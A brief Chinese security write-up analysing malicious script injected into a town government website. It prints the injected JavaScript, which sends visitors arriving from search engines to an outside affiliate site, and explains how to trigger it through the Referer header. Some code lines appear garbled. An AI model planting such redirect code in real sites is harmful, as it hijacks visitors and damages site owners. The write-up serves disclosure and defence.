古竹镇人民政府网挂马分析 网站名称 古竹镇人民政府网 网站域名 www.guzhu.gov.cn 挂马页面 http://www.guzhu.gov.cn/index.asp 挂马代码 恶意代码 var _hmt = _hmt || []; (function() { var hm = document.(""); hm.src = "https://hm.baidu.com/hm.js?cfe824ad30beb506ef0afb3c32d38f0b"; var s = document.getElementsByTagName("")[0]; s.parentNode.insertBefore(hm, s); })(); var refurl=document.referrer if(refurl.indexOf("sogou")>0 || refurl.indexOf("baidu")>0 || refurl.indexOf("so")>0 ) window.location.href="http://www.13699e.com/?aff=d889300"; 代码分析 对页面请求来源进行判断,当请求来源包含“sogou”、“baidu”、“so”等关键字时,页面跳转至“http://www.13699e.com/?aff=d889300”。 触发执行 设置请求头为:Referer:http://www.baidu.com/返回搜狐,查看更多
责任编辑:
